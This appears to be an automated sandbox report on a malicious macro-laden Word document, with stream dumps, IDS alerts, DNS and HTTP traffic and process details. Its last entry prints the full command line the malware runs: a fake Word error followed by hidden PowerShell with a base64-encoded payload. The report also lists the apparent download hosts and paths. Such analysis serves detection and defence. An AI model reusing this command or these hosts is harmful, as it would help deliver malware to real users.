                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm5/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62202697924
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm5/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm5/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5949
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:5949
                                            Entropy:5.26993168344
                                            Base64 Encoded:False
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                            Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1039
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:data
                                            Stream Size:1039
                                            Entropy:6.60831708882
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . d . m . . A . ! O f f i c .
                                            Data Raw:01 0b b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 99 86 d0 61 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                            Stream Path: WordDocument, File Type: data, Stream Size: 43108
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:43108
                                            Entropy:3.69797214633
                                            Base64 Encoded:False
                                            Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8c a3 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a8 00 00 70 61 21 5c 70 61 21 5c 8c 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            02/01/21-23:18:24.263263TCP1201ATTACK-RESPONSES 403 Forbidden804916970.32.23.44192.168.2.22

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Feb 1, 2021 23:18:22.695205927 CET49165443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.732157946 CET44349165194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.732319117 CET49165443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.762888908 CET49165443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.800909042 CET44349165194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.800952911 CET44349165194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.800971031 CET44349165194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.801064968 CET49165443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.811193943 CET49165443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.812695026 CET49166443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.846435070 CET44349165194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.847778082 CET44349166194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.847954988 CET49166443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.848478079 CET49166443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.883558035 CET44349166194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.883589983 CET44349166194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.883620977 CET44349166194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:22.883802891 CET49166443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.887851954 CET49166443192.168.2.22194.209.195.106
                                            Feb 1, 2021 23:18:22.922931910 CET44349166194.209.195.106192.168.2.22
                                            Feb 1, 2021 23:18:23.245258093 CET49167443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.411760092 CET4434916735.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.411881924 CET49167443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.412431002 CET49167443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.577241898 CET4434916735.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.577435017 CET4434916735.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.577467918 CET4434916735.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.577567101 CET49167443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.580847025 CET49167443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.581902981 CET49168443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.734143019 CET4434916835.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.734395981 CET49168443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.734992981 CET49168443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.744673014 CET4434916735.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.887254953 CET4434916835.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.887310982 CET4434916835.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.887334108 CET4434916835.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:23.887692928 CET49168443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.891843081 CET49168443192.168.2.2235.208.182.43
                                            Feb 1, 2021 23:18:23.960618973 CET4916980192.168.2.2270.32.23.44
                                            Feb 1, 2021 23:18:24.044192076 CET4434916835.208.182.43192.168.2.22
                                            Feb 1, 2021 23:18:24.111449003 CET804916970.32.23.44192.168.2.22
                                            Feb 1, 2021 23:18:24.111581087 CET4916980192.168.2.2270.32.23.44
                                            Feb 1, 2021 23:18:24.111821890 CET4916980192.168.2.2270.32.23.44
                                            Feb 1, 2021 23:18:24.261250973 CET804916970.32.23.44192.168.2.22
                                            Feb 1, 2021 23:18:24.263262987 CET804916970.32.23.44192.168.2.22
                                            Feb 1, 2021 23:18:24.446388006 CET49170443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.471604109 CET4916980192.168.2.2270.32.23.44
                                            Feb 1, 2021 23:18:24.611052036 CET4434917035.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:24.611150026 CET49170443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.611644983 CET49170443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.776693106 CET4434917035.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:24.776772976 CET4434917035.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:24.776843071 CET4434917035.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:24.777348995 CET49170443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.780910969 CET49170443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.781919956 CET49171443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.937520981 CET4434917135.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:24.937607050 CET49171443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.937974930 CET49171443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:24.945700884 CET4434917035.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:25.092066050 CET4434917135.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:25.092327118 CET4434917135.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:25.092343092 CET4434917135.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:25.092441082 CET49171443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:25.096611977 CET49171443192.168.2.2235.208.153.170
                                            Feb 1, 2021 23:18:25.251209974 CET4434917135.208.153.170192.168.2.22
                                            Feb 1, 2021 23:18:25.913345098 CET4917280192.168.2.22103.205.64.138
                                            Feb 1, 2021 23:18:26.099870920 CET8049172103.205.64.138192.168.2.22
                                            Feb 1, 2021 23:18:26.099977970 CET4917280192.168.2.22103.205.64.138
                                            Feb 1, 2021 23:18:26.100141048 CET4917280192.168.2.22103.205.64.138
                                            Feb 1, 2021 23:18:26.285213947 CET8049172103.205.64.138192.168.2.22
                                            Feb 1, 2021 23:18:26.287111998 CET8049172103.205.64.138192.168.2.22
                                            Feb 1, 2021 23:18:26.484345913 CET4917280192.168.2.22103.205.64.138
                                            Feb 1, 2021 23:18:26.557374001 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:26.818093061 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:26.818281889 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:26.819009066 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:27.079679966 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:27.081716061 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:27.081768990 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:27.081789970 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:27.081876040 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:27.092003107 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:27.263094902 CET804916970.32.23.44192.168.2.22
                                            Feb 1, 2021 23:18:27.263226032 CET4916980192.168.2.2270.32.23.44
                                            Feb 1, 2021 23:18:27.354798079 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:27.560590982 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:29.021287918 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:29.321024895 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760476112 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760529041 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760577917 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760622025 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760664940 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760703087 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760734081 CET44349173177.12.163.108192.168.2.22
                                            Feb 1, 2021 23:18:29.760785103 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:29.760833025 CET49173443192.168.2.22177.12.163.108
                                            Feb 1, 2021 23:18:29.760839939 CET49173443192.168.2.22177.12.163.108

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Feb 1, 2021 23:18:22.615789890 CET5219753192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:22.684333086 CET53521978.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:22.940922022 CET5309953192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:23.009460926 CET53530998.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:23.023952007 CET5283853192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:23.172079086 CET53528388.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:23.181684017 CET6120053192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:23.244585991 CET53612008.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:23.903026104 CET4954853192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:23.959758043 CET53495488.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:24.276830912 CET5562753192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:24.445439100 CET53556278.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:25.107305050 CET5600953192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:25.912532091 CET53560098.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:26.296263933 CET6186553192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:26.556272030 CET53618658.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:27.636789083 CET5517153192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:27.687539101 CET53551718.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:27.692358017 CET5249653192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:27.744360924 CET53524968.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:28.252748013 CET5756453192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:28.310488939 CET53575648.8.8.8192.168.2.22
                                            Feb 1, 2021 23:18:28.313611984 CET6300953192.168.2.228.8.8.8
                                            Feb 1, 2021 23:18:28.369986057 CET53630098.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Feb 1, 2021 23:18:22.615789890 CET192.168.2.228.8.8.80x8c10Standard query (0)physio-svdh.chA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:22.940922022 CET192.168.2.228.8.8.80x644cStandard query (0)arquivopop.com.brA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:23.023952007 CET192.168.2.228.8.8.80xd372Standard query (0)transfersuvan.comA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:23.181684017 CET192.168.2.228.8.8.80x26d4Standard query (0)www.isatechnology.comA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:23.903026104 CET192.168.2.228.8.8.80xad13Standard query (0)ownitconsignment.comA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:24.276830912 CET192.168.2.228.8.8.80xb648Standard query (0)cairocad.comA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:25.107305050 CET192.168.2.228.8.8.80x396fStandard query (0)hotelshivansh.comA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:26.296263933 CET192.168.2.228.8.8.80x7307Standard query (0)b2bcom.com.brA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Feb 1, 2021 23:18:22.684333086 CET8.8.8.8192.168.2.220x8c10No error (0)physio-svdh.ch194.209.195.106A (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:23.009460926 CET8.8.8.8192.168.2.220x644cName error (3)arquivopop.com.brnonenoneA (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:23.172079086 CET8.8.8.8192.168.2.220xd372No error (0)transfersuvan.com0.0.0.0A (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:23.244585991 CET8.8.8.8192.168.2.220x26d4No error (0)www.isatechnology.comisatechnology.comCNAME (Canonical name)IN (0x0001)
                                            Feb 1, 2021 23:18:23.244585991 CET8.8.8.8192.168.2.220x26d4No error (0)isatechnology.com35.208.182.43A (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:23.959758043 CET8.8.8.8192.168.2.220xad13No error (0)ownitconsignment.com70.32.23.44A (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:24.445439100 CET8.8.8.8192.168.2.220xb648No error (0)cairocad.com35.208.153.170A (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:25.912532091 CET8.8.8.8192.168.2.220x396fNo error (0)hotelshivansh.com103.205.64.138A (IP address)IN (0x0001)
                                            Feb 1, 2021 23:18:26.556272030 CET8.8.8.8192.168.2.220x7307No error (0)b2bcom.com.br177.12.163.108A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • ownitconsignment.com
                                            • hotelshivansh.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.224916970.32.23.4480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Feb 1, 2021 23:18:24.111821890 CET4OUTGET /files/b/ HTTP/1.1
                                            Host: ownitconsignment.com
                                            Connection: Keep-Alive
                                            Feb 1, 2021 23:18:24.263262987 CET4INHTTP/1.1 403 Forbidden
                                            Date: Mon, 01 Feb 2021 22:18:24 GMT
                                            Server: Apache
                                            Strict-Transport-Security: max-age=63072000; includeSubDomains
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Content-Length: 318
                                            Keep-Alive: timeout=3, max=500
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.2249172103.205.64.13880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Feb 1, 2021 23:18:26.100141048 CET6OUTGET /UserFiles/8/ HTTP/1.1
                                            Host: hotelshivansh.com
                                            Connection: Keep-Alive
                                            Feb 1, 2021 23:18:26.287111998 CET7INHTTP/1.1 404 Not Found
                                            Date: Mon, 01 Feb 2021 22:18:25 GMT
                                            Server: Apache
                                            Content-Length: 315
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            HTTPS Packets

                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                            Feb 1, 2021 23:18:27.081768990 CET177.12.163.108443192.168.2.2249173CN=b2bcom.com.br CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Dec 06 02:36:41 CET 2020 Wed Oct 07 21:21:40 CEST 2020Sat Mar 06 02:36:41 CET 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:23:17:36
                                            Start date:01/02/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13ff00000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:23:17:39
                                            Start date:01/02/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJw